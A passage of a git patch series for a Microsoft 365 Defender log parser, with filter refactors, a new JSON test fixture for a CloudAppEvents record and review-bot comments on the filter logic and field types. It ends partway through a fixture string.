+ "network"
+ ],
+ "dataset": "flows",
+ "outcome": "allow",
+ "type": [
+ "allowed"
+ ]
+ },
+ "@timestamp": "2024-10-02T09:42:43.911654Z",
+ "action": {
+ "outcome": "allow"
+ },
+ "destination": {
+ "address": "5.6.7.8",
+ "ip": "5.6.7.8"
+ },
+ "network": {
+ "protocol": "icmp6"
+ },
+ "observer": {
+ "hostname": "FW_MX_01"
+ },
+ "related": {
+ "hosts": [
+ "FW_MX_01"
+ ],
+ "ip": [
+ "1.2.3.4",
+ "5.6.7.8"
+ ]
+ },
+ "source": {
+ "address": "1.2.3.4",
+ "ip": "1.2.3.4",
+ "mac": "00:11:22:33:44:55"
+ }
+ }
+}
\ No newline at end of file
From 4ee5a44352486c62e4f59be6596d6aed2831965d Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Fri, 4 Oct 2024 10:29:28 +0200
Subject: [PATCH 112/317] refactor(Microsoft): reduce some filters
---
 Microsoft/microsoft-365-defender/ingest/parser.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index d183492a1..f489a4558 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -259,7 +259,7 @@ stages: process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" - filter: '{{ json_event.message.get("category") != "AdvancedHunting-DeviceEvents" and json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}' + filter: '{{ json_event.message.get("category") not in ["AdvancedHunting-DeviceEvents", "AdvancedHunting-DeviceProcessEvents"]}}' - set: process.name: "{{json_event.message.properties.FileName}}" @@ -280,7 +280,7 @@ stages: process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" - filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceEvents" or json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}' + filter: '{{json_event.message.get("category") in ["AdvancedHunting-DeviceEvents", "AdvancedHunting-DeviceProcessEvents"]}}' set_alert_evidence_fields: actions: - set: From 74428e7e88beae6de63197b87be7eb4e34ccebb2 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 4 Oct 2024 10:39:30 +0200 Subject: [PATCH 113/317] Fix filter --- .../microsoft-365-defender/ingest/parser.yml | 2 +- .../tests/test_additional_fields_error1.json | 115 ++++++++++++++++++ 2 files changed, 116 insertions(+), 1 deletion(-) create mode 100644 Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 0704ce4ca..142a05997 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -26,7 +26,7 @@ pipeline: input_field: "{{json_event.message.properties.LoggedOnUsers}}" output_field: "users" - name: parse_additional_fields - filter: '{{json_event.message.get("properties", {}).get("AdditionalFields") | length > 0}}' + filter: '{{json_event.message.get("category") in ["AdvancedHunting-AlertEvidence","AdvancedHunting-DeviceNetworkEvents"] and json_event.message.get("properties", {}).get("AdditionalFields") | length > 0}}' external: name: json.parse-json properties: diff --git a/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json b/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json new file mode 100644 index 000000000..c3f8b5f91 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json 
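Review bot: Gating `parse_additional_fields` on a category allow-list fixes the failure for `AdvancedHunting-CloudAppEvents`, where `AdditionalFields` arrives as an object (see the fixture in the next hunk), but it also silently skips every other category that does deliver it as a JSON string, and the list will need maintenance as new tables appear. Testing the value's shape instead keeps the original behaviour everywhere it worked: `filter: '{{json_event.message.get("properties", {}).get("AdditionalFields") is string and json_event.message.get("properties", {}).get("AdditionalFields") | length > 0}}'`. Either way, `length` on a `null` `AdditionalFields` would presumably still raise inside the allowed categories, and the `is string` form covers that case too.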
@@ -0,0 +1,115 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + }, + "message": "{\"time\":\"2024-10-01T08:25:13.7165282Z\",\"tenantId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-01T08:22:28.4690000Z\",\"properties\":{\"ActionType\":\"Send\",\"ApplicationId\":20893,\"AccountDisplayName\":\"jDOE microsoft graph\",\"AccountObjectId\":null,\"AccountId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"DeviceType\":\"Other\",\"OSPlatform\":\"Unknown\",\"IPAddress\":\"1.2.3.4\",\"IsAnonymousProxy\":false,\"CountryCode\":\"FR\",\"City\":\"Paris\",\"ISP\":\"Microsoft 365 Common and Office Online server\",\"UserAgent\":\"Client=Client;Client=Client;;\",\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Account\",\"Role\":\"Actor\",\"Name\":\"jDOE microsoft graph\",\"Id\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ApplicationId\":11166,\"ApplicationInstance\":0},{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Session ID\"},{\"Type\":\"Task\",\"Role\":\"Target object\",\"Name\":\"Send\"},{\"Type\":\"User\",\"Role\":\"Parameter\",\"Name\":\"noreply jDOE\",\"Id\":\"22222222-2222-2222-2222-e7a7d2c427c8\",\"ApplicationId\":11166,\"ApplicationInstance\":0}],\"AdditionalFields\":{\"Source Mac\":\"11:22:33:44:55:66\"},\"ActivityType\":\"Run\",\"ObjectName\":\"Send\",\"ObjectType\":\"Task\",\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Application\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":[\"Microsoft 365 Common and Office Online server\",\"Microsoft Azure\",\"Microsoft 365\"],\"IPCategory\":\"Cloud provider\",\"UserAgentTags\":null,\"RawEventData\":{\"AppId\":\"00000003-0000-0000-c000-000000000000\",\"ClientAppId\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ClientIP\":\"1.2.3.4\",\"ClientIPAddress\":\"1.2.3.4 
\",\"ClientInfoString\":\"Client=Client;Client=ClientSystem;;\",\"ClientRequestId\":\"22222222-2222-2222-2222-865deac528e4\",\"CreationTime\":\"2024-10-01T08:18:26Z\",\"ExternalAccess\":false,\"Id\":\"22222222-2222-2222-2222-08dce1f19ff1\",\"InternalLogonType\":0,\"Item\":{\"Id\":\"RgAAAACAAAAAAAAAAAAAAAAAAncHuoKBwCQDhyvSYsvTYNL\",\"ImmutableId\":\"LgAAAAAAAAAAAAAAAAAAAAAAADQCQDhyvSYsvTYNLegb6cgrxAAAo4zpzAAAJ\",\"InternetMessageId\":\"\",\"ParentFolder\":{\"Id\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAQCQDhyvSYsvTYNLegb6cgrxAAAAAAEPAAAB\",\"Path\":\"\\\\\\\\Drafts\"},\"SizeInBytes\":4199,\"Subject\":\"subject test\"},\"LogonType\":0,\"LogonUserSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxGuid\":\"22222222-2222-2222-2222-b228527c6288\",\"MailboxOwnerMasterAccountSid\":\"S-1-1-11\",\"MailboxOwnerSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxOwnerUPN\":\"noreply@test.co\",\"Operation\":\"Send\",\"OrganizationId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"OrganizationName\":\"test.onmicrosoft.com\",\"OriginatingServer\":\"SN7PR11MB0000(5.6.7700.000)\\\\r\\\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"SaveToSentItems\":true,\"UserId\":\"noreply@test.co\",\"UserKey\":\"22222222-2222-2222-2222-8e9a218ac860\",\"UserType\":5,\"Version\":1,\"Workload\":\"Exchange\"},\"ReportId\":\"22222222-2222-2222-2222-a036-08dce1f19ff1\",\"Timestamp\":\"2024-10-01T08:18:26Z\",\"Application\":\"Microsoft Exchange Online\"},\"Tenant\":\"DefaultTenant\"}" + }, + "expected": { + "message": "{\"time\":\"2024-10-01T08:25:13.7165282Z\",\"tenantId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-01T08:22:28.4690000Z\",\"properties\":{\"ActionType\":\"Send\",\"ApplicationId\":20893,\"AccountDisplayName\":\"jDOE microsoft 
graph\",\"AccountObjectId\":null,\"AccountId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"DeviceType\":\"Other\",\"OSPlatform\":\"Unknown\",\"IPAddress\":\"1.2.3.4\",\"IsAnonymousProxy\":false,\"CountryCode\":\"FR\",\"City\":\"Paris\",\"ISP\":\"Microsoft 365 Common and Office Online server\",\"UserAgent\":\"Client=Client;Client=Client;;\",\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Account\",\"Role\":\"Actor\",\"Name\":\"jDOE microsoft graph\",\"Id\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ApplicationId\":11166,\"ApplicationInstance\":0},{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Session ID\"},{\"Type\":\"Task\",\"Role\":\"Target object\",\"Name\":\"Send\"},{\"Type\":\"User\",\"Role\":\"Parameter\",\"Name\":\"noreply jDOE\",\"Id\":\"22222222-2222-2222-2222-e7a7d2c427c8\",\"ApplicationId\":11166,\"ApplicationInstance\":0}],\"AdditionalFields\":{\"Source Mac\":\"11:22:33:44:55:66\"},\"ActivityType\":\"Run\",\"ObjectName\":\"Send\",\"ObjectType\":\"Task\",\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Application\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":[\"Microsoft 365 Common and Office Online server\",\"Microsoft Azure\",\"Microsoft 365\"],\"IPCategory\":\"Cloud provider\",\"UserAgentTags\":null,\"RawEventData\":{\"AppId\":\"00000003-0000-0000-c000-000000000000\",\"ClientAppId\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ClientIP\":\"1.2.3.4\",\"ClientIPAddress\":\"1.2.3.4 
\",\"ClientInfoString\":\"Client=Client;Client=ClientSystem;;\",\"ClientRequestId\":\"22222222-2222-2222-2222-865deac528e4\",\"CreationTime\":\"2024-10-01T08:18:26Z\",\"ExternalAccess\":false,\"Id\":\"22222222-2222-2222-2222-08dce1f19ff1\",\"InternalLogonType\":0,\"Item\":{\"Id\":\"RgAAAACAAAAAAAAAAAAAAAAAAncHuoKBwCQDhyvSYsvTYNL\",\"ImmutableId\":\"LgAAAAAAAAAAAAAAAAAAAAAAADQCQDhyvSYsvTYNLegb6cgrxAAAo4zpzAAAJ\",\"InternetMessageId\":\"\",\"ParentFolder\":{\"Id\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAQCQDhyvSYsvTYNLegb6cgrxAAAAAAEPAAAB\",\"Path\":\"\\\\\\\\Drafts\"},\"SizeInBytes\":4199,\"Subject\":\"subject test\"},\"LogonType\":0,\"LogonUserSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxGuid\":\"22222222-2222-2222-2222-b228527c6288\",\"MailboxOwnerMasterAccountSid\":\"S-1-1-11\",\"MailboxOwnerSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxOwnerUPN\":\"noreply@test.co\",\"Operation\":\"Send\",\"OrganizationId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"OrganizationName\":\"test.onmicrosoft.com\",\"OriginatingServer\":\"SN7PR11MB0000(5.6.7700.000)\\\\r\\\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"SaveToSentItems\":true,\"UserId\":\"noreply@test.co\",\"UserKey\":\"22222222-2222-2222-2222-8e9a218ac860\",\"UserType\":5,\"Version\":1,\"Workload\":\"Exchange\"},\"ReportId\":\"22222222-2222-2222-2222-a036-08dce1f19ff1\",\"Timestamp\":\"2024-10-01T08:18:26Z\",\"Application\":\"Microsoft Exchange Online\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-01T08:18:26Z", + "action": { + "properties": { + "Application": "Microsoft Exchange Online", + "ApplicationId": "20893", + "IPCategory": "Cloud provider", + "IPTags": [ + "Microsoft 365", + "Microsoft 365 Common and Office Online server", + "Microsoft Azure" + ], + "ISP": "Microsoft 365 Common and Office Online server", + "IsAdminOperation": "false", + 
"IsAnonymousProxy": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "ObjectName": "Send", + "ObjectType": "Task", + "RawEventData": "{\"AppId\": \"00000003-0000-0000-c000-000000000000\", \"ClientAppId\": \"22222222-2222-2222-2222-8e9a218ac860\", \"ClientIP\": \"1.2.3.4\", \"ClientIPAddress\": \"1.2.3.4 \", \"ClientInfoString\": \"Client=Client;Client=ClientSystem;;\", \"ClientRequestId\": \"22222222-2222-2222-2222-865deac528e4\", \"CreationTime\": \"2024-10-01T08:18:26Z\", \"ExternalAccess\": false, \"Id\": \"22222222-2222-2222-2222-08dce1f19ff1\", \"InternalLogonType\": 0, \"Item\": {\"Id\": \"RgAAAACAAAAAAAAAAAAAAAAAAncHuoKBwCQDhyvSYsvTYNL\", \"ImmutableId\": \"LgAAAAAAAAAAAAAAAAAAAAAAADQCQDhyvSYsvTYNLegb6cgrxAAAo4zpzAAAJ\", \"InternetMessageId\": \"\", \"ParentFolder\": {\"Id\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAQCQDhyvSYsvTYNLegb6cgrxAAAAAAEPAAAB\", \"Path\": \"\\\\\\\\Drafts\"}, \"SizeInBytes\": 4199, \"Subject\": \"subject test\"}, \"LogonType\": 0, \"LogonUserSid\": \"S-1-1-11-33333333333-222222222-66666666666-9341774\", \"MailboxGuid\": \"22222222-2222-2222-2222-b228527c6288\", \"MailboxOwnerMasterAccountSid\": \"S-1-1-11\", \"MailboxOwnerSid\": \"S-1-1-11-33333333333-222222222-66666666666-9341774\", \"MailboxOwnerUPN\": \"noreply@test.co\", \"Operation\": \"Send\", \"OrganizationId\": \"22222222-2222-2222-2222-c5ea28204b4b\", \"OrganizationName\": \"test.onmicrosoft.com\", \"OriginatingServer\": \"SN7PR11MB0000(5.6.7700.000)\\\\r\\\\n\", \"RecordType\": 2, \"ResultStatus\": \"Succeeded\", \"SaveToSentItems\": true, \"UserId\": \"noreply@test.co\", \"UserKey\": \"22222222-2222-2222-2222-8e9a218ac860\", \"UserType\": 5, \"Version\": 1, \"Workload\": \"Exchange\"}" + }, + "type": "Send" + }, + "host": { + "os": { + "full": "Unknown" + }, + "type": "Other" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "ApplicationId": 11166, + "ApplicationInstance": 0, + "Id": "22222222-2222-2222-2222-8e9a218ac860", + "Name": "jDOE 
microsoft graph", + "Role": "Actor", + "Type": "Account" + }, + { + "Role": "Parameter", + "ServiceObjectType": "Session ID", + "Type": "Structured object" + }, + { + "Name": "Send", + "Role": "Target object", + "Type": "Task" + }, + { + "ApplicationId": 11166, + "ApplicationInstance": 0, + "Id": "22222222-2222-2222-2222-e7a7d2c427c8", + "Name": "noreply jDOE", + "Role": "Parameter", + "Type": "User" + } + ], + "type": "Run" + }, + "report": { + "id": "22222222-2222-2222-2222-a036-08dce1f19ff1" + } + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "geo": { + "city_name": "Paris", + "country_iso_code": "FR" + }, + "ip": "1.2.3.4" + }, + "user": { + "full_name": "jDOE microsoft graph" + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Other", + "original": "Client=Client;Client=Client;;", + "os": { + "name": "Other" + } + } + } +} \ No newline at end of file From c2d470cdcc470774c75bb6f61cf48d99058788c3 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Fri, 4 Oct 2024 10:41:12 +0200 Subject: [PATCH 114/317] Apply linter --- .../tests/test_additional_fields_error1.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json b/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json index c3f8b5f91..062589e72 100644 --- a/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json +++ b/Microsoft/microsoft-365-defender/tests/test_additional_fields_error1.json 
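Review bot: The pinned `action.properties` mixes representations of the same boolean concept — `"IsAdminOperation": "false"` and `"IsAnonymousProxy": "false"` are strings while `"IsExternalUser": false` and `"IsImpersonated": false` are booleans, and `"ApplicationId": "20893"` is a string where the nested `ActivityObjects[].ApplicationId` is the number `11166`. Those look like the parser's output rather than a choice made in this fixture, but committing them as expected values turns the inconsistency into a contract that detection rules will have to match with two comparisons. Worth confirming whether the string forms are intended before this file locks them in.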
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"time\":\"2024-10-01T08:25:13.7165282Z\",\"tenantId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-01T08:22:28.4690000Z\",\"properties\":{\"ActionType\":\"Send\",\"ApplicationId\":20893,\"AccountDisplayName\":\"jDOE microsoft graph\",\"AccountObjectId\":null,\"AccountId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"DeviceType\":\"Other\",\"OSPlatform\":\"Unknown\",\"IPAddress\":\"1.2.3.4\",\"IsAnonymousProxy\":false,\"CountryCode\":\"FR\",\"City\":\"Paris\",\"ISP\":\"Microsoft 365 Common and Office Online server\",\"UserAgent\":\"Client=Client;Client=Client;;\",\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Account\",\"Role\":\"Actor\",\"Name\":\"jDOE microsoft graph\",\"Id\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ApplicationId\":11166,\"ApplicationInstance\":0},{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Session ID\"},{\"Type\":\"Task\",\"Role\":\"Target object\",\"Name\":\"Send\"},{\"Type\":\"User\",\"Role\":\"Parameter\",\"Name\":\"noreply jDOE\",\"Id\":\"22222222-2222-2222-2222-e7a7d2c427c8\",\"ApplicationId\":11166,\"ApplicationInstance\":0}],\"AdditionalFields\":{\"Source Mac\":\"11:22:33:44:55:66\"},\"ActivityType\":\"Run\",\"ObjectName\":\"Send\",\"ObjectType\":\"Task\",\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Application\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":[\"Microsoft 365 Common and Office Online server\",\"Microsoft Azure\",\"Microsoft 365\"],\"IPCategory\":\"Cloud provider\",\"UserAgentTags\":null,\"RawEventData\":{\"AppId\":\"00000003-0000-0000-c000-000000000000\",\"ClientAppId\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ClientIP\":\"1.2.3.4\",\"ClientIPAddress\":\"1.2.3.4 
\",\"ClientInfoString\":\"Client=Client;Client=ClientSystem;;\",\"ClientRequestId\":\"22222222-2222-2222-2222-865deac528e4\",\"CreationTime\":\"2024-10-01T08:18:26Z\",\"ExternalAccess\":false,\"Id\":\"22222222-2222-2222-2222-08dce1f19ff1\",\"InternalLogonType\":0,\"Item\":{\"Id\":\"RgAAAACAAAAAAAAAAAAAAAAAAncHuoKBwCQDhyvSYsvTYNL\",\"ImmutableId\":\"LgAAAAAAAAAAAAAAAAAAAAAAADQCQDhyvSYsvTYNLegb6cgrxAAAo4zpzAAAJ\",\"InternetMessageId\":\"\",\"ParentFolder\":{\"Id\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAQCQDhyvSYsvTYNLegb6cgrxAAAAAAEPAAAB\",\"Path\":\"\\\\\\\\Drafts\"},\"SizeInBytes\":4199,\"Subject\":\"subject test\"},\"LogonType\":0,\"LogonUserSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxGuid\":\"22222222-2222-2222-2222-b228527c6288\",\"MailboxOwnerMasterAccountSid\":\"S-1-1-11\",\"MailboxOwnerSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxOwnerUPN\":\"noreply@test.co\",\"Operation\":\"Send\",\"OrganizationId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"OrganizationName\":\"test.onmicrosoft.com\",\"OriginatingServer\":\"SN7PR11MB0000(5.6.7700.000)\\\\r\\\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"SaveToSentItems\":true,\"UserId\":\"noreply@test.co\",\"UserKey\":\"22222222-2222-2222-2222-8e9a218ac860\",\"UserType\":5,\"Version\":1,\"Workload\":\"Exchange\"},\"ReportId\":\"22222222-2222-2222-2222-a036-08dce1f19ff1\",\"Timestamp\":\"2024-10-01T08:18:26Z\",\"Application\":\"Microsoft Exchange Online\"},\"Tenant\":\"DefaultTenant\"}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 Defender", "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" } - }, - "message": "{\"time\":\"2024-10-01T08:25:13.7165282Z\",\"tenantId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-01T08:22:28.4690000Z\",\"properties\":{\"ActionType\":\"Send\",\"ApplicationId\":20893,\"AccountDisplayName\":\"jDOE microsoft 
graph\",\"AccountObjectId\":null,\"AccountId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"DeviceType\":\"Other\",\"OSPlatform\":\"Unknown\",\"IPAddress\":\"1.2.3.4\",\"IsAnonymousProxy\":false,\"CountryCode\":\"FR\",\"City\":\"Paris\",\"ISP\":\"Microsoft 365 Common and Office Online server\",\"UserAgent\":\"Client=Client;Client=Client;;\",\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Account\",\"Role\":\"Actor\",\"Name\":\"jDOE microsoft graph\",\"Id\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ApplicationId\":11166,\"ApplicationInstance\":0},{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Session ID\"},{\"Type\":\"Task\",\"Role\":\"Target object\",\"Name\":\"Send\"},{\"Type\":\"User\",\"Role\":\"Parameter\",\"Name\":\"noreply jDOE\",\"Id\":\"22222222-2222-2222-2222-e7a7d2c427c8\",\"ApplicationId\":11166,\"ApplicationInstance\":0}],\"AdditionalFields\":{\"Source Mac\":\"11:22:33:44:55:66\"},\"ActivityType\":\"Run\",\"ObjectName\":\"Send\",\"ObjectType\":\"Task\",\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Application\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":[\"Microsoft 365 Common and Office Online server\",\"Microsoft Azure\",\"Microsoft 365\"],\"IPCategory\":\"Cloud provider\",\"UserAgentTags\":null,\"RawEventData\":{\"AppId\":\"00000003-0000-0000-c000-000000000000\",\"ClientAppId\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ClientIP\":\"1.2.3.4\",\"ClientIPAddress\":\"1.2.3.4 
\",\"ClientInfoString\":\"Client=Client;Client=ClientSystem;;\",\"ClientRequestId\":\"22222222-2222-2222-2222-865deac528e4\",\"CreationTime\":\"2024-10-01T08:18:26Z\",\"ExternalAccess\":false,\"Id\":\"22222222-2222-2222-2222-08dce1f19ff1\",\"InternalLogonType\":0,\"Item\":{\"Id\":\"RgAAAACAAAAAAAAAAAAAAAAAAncHuoKBwCQDhyvSYsvTYNL\",\"ImmutableId\":\"LgAAAAAAAAAAAAAAAAAAAAAAADQCQDhyvSYsvTYNLegb6cgrxAAAo4zpzAAAJ\",\"InternetMessageId\":\"\",\"ParentFolder\":{\"Id\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAQCQDhyvSYsvTYNLegb6cgrxAAAAAAEPAAAB\",\"Path\":\"\\\\\\\\Drafts\"},\"SizeInBytes\":4199,\"Subject\":\"subject test\"},\"LogonType\":0,\"LogonUserSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxGuid\":\"22222222-2222-2222-2222-b228527c6288\",\"MailboxOwnerMasterAccountSid\":\"S-1-1-11\",\"MailboxOwnerSid\":\"S-1-1-11-33333333333-222222222-66666666666-9341774\",\"MailboxOwnerUPN\":\"noreply@test.co\",\"Operation\":\"Send\",\"OrganizationId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"OrganizationName\":\"test.onmicrosoft.com\",\"OriginatingServer\":\"SN7PR11MB0000(5.6.7700.000)\\\\r\\\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"SaveToSentItems\":true,\"UserId\":\"noreply@test.co\",\"UserKey\":\"22222222-2222-2222-2222-8e9a218ac860\",\"UserType\":5,\"Version\":1,\"Workload\":\"Exchange\"},\"ReportId\":\"22222222-2222-2222-2222-a036-08dce1f19ff1\",\"Timestamp\":\"2024-10-01T08:18:26Z\",\"Application\":\"Microsoft Exchange Online\"},\"Tenant\":\"DefaultTenant\"}" + } }, "expected": { "message": "{\"time\":\"2024-10-01T08:25:13.7165282Z\",\"tenantId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-01T08:22:28.4690000Z\",\"properties\":{\"ActionType\":\"Send\",\"ApplicationId\":20893,\"AccountDisplayName\":\"jDOE microsoft 
graph\",\"AccountObjectId\":null,\"AccountId\":\"22222222-2222-2222-2222-c5ea28204b4b\",\"DeviceType\":\"Other\",\"OSPlatform\":\"Unknown\",\"IPAddress\":\"1.2.3.4\",\"IsAnonymousProxy\":false,\"CountryCode\":\"FR\",\"City\":\"Paris\",\"ISP\":\"Microsoft 365 Common and Office Online server\",\"UserAgent\":\"Client=Client;Client=Client;;\",\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Account\",\"Role\":\"Actor\",\"Name\":\"jDOE microsoft graph\",\"Id\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ApplicationId\":11166,\"ApplicationInstance\":0},{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Session ID\"},{\"Type\":\"Task\",\"Role\":\"Target object\",\"Name\":\"Send\"},{\"Type\":\"User\",\"Role\":\"Parameter\",\"Name\":\"noreply jDOE\",\"Id\":\"22222222-2222-2222-2222-e7a7d2c427c8\",\"ApplicationId\":11166,\"ApplicationInstance\":0}],\"AdditionalFields\":{\"Source Mac\":\"11:22:33:44:55:66\"},\"ActivityType\":\"Run\",\"ObjectName\":\"Send\",\"ObjectType\":\"Task\",\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Application\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":[\"Microsoft 365 Common and Office Online server\",\"Microsoft Azure\",\"Microsoft 365\"],\"IPCategory\":\"Cloud provider\",\"UserAgentTags\":null,\"RawEventData\":{\"AppId\":\"00000003-0000-0000-c000-000000000000\",\"ClientAppId\":\"22222222-2222-2222-2222-8e9a218ac860\",\"ClientIP\":\"1.2.3.4\",\"ClientIPAddress\":\"1.2.3.4 
\",\"ClientInfoString\":\"Client=Client;Client=ClientSystem;;\",\"ClientRequestId\":\"22222222-2222-2222-2222-865deac528e4\",\"CreationTime\":\"2024-10-01T08:18:26Z\",\"ExternalAccess\":false,\"Id\":\"22222222-2222-2222-2222-08dce1f19ff1\",\"InternalLogonType\":0,\"Item\":{\"Id\":\"RgAAAACAAAAAAAAAAAAAAAAAAncHuoKBwCQDhyvSYsvTYNL\",\"ImmutableId\":\"LgAAAAAAAAAAAAAAAAAAAAAAADQCQDhyvSYsvTYNLegb6cgrxAAAo4zpzAAAJ\",\"InternetMessageId\":\"\",\"ParentFolder\":{\"Id\":\"AAAAAAAAAAAAAAAAAAAAAAAAAAQCQDhyvSYsvTYNLegb6cgrxAAAAAAEPAAAB\",\"Path\":\"\\\\\\\\Drafts\"},\"SizeInBytes\":4199,\"Subject\":\"subject 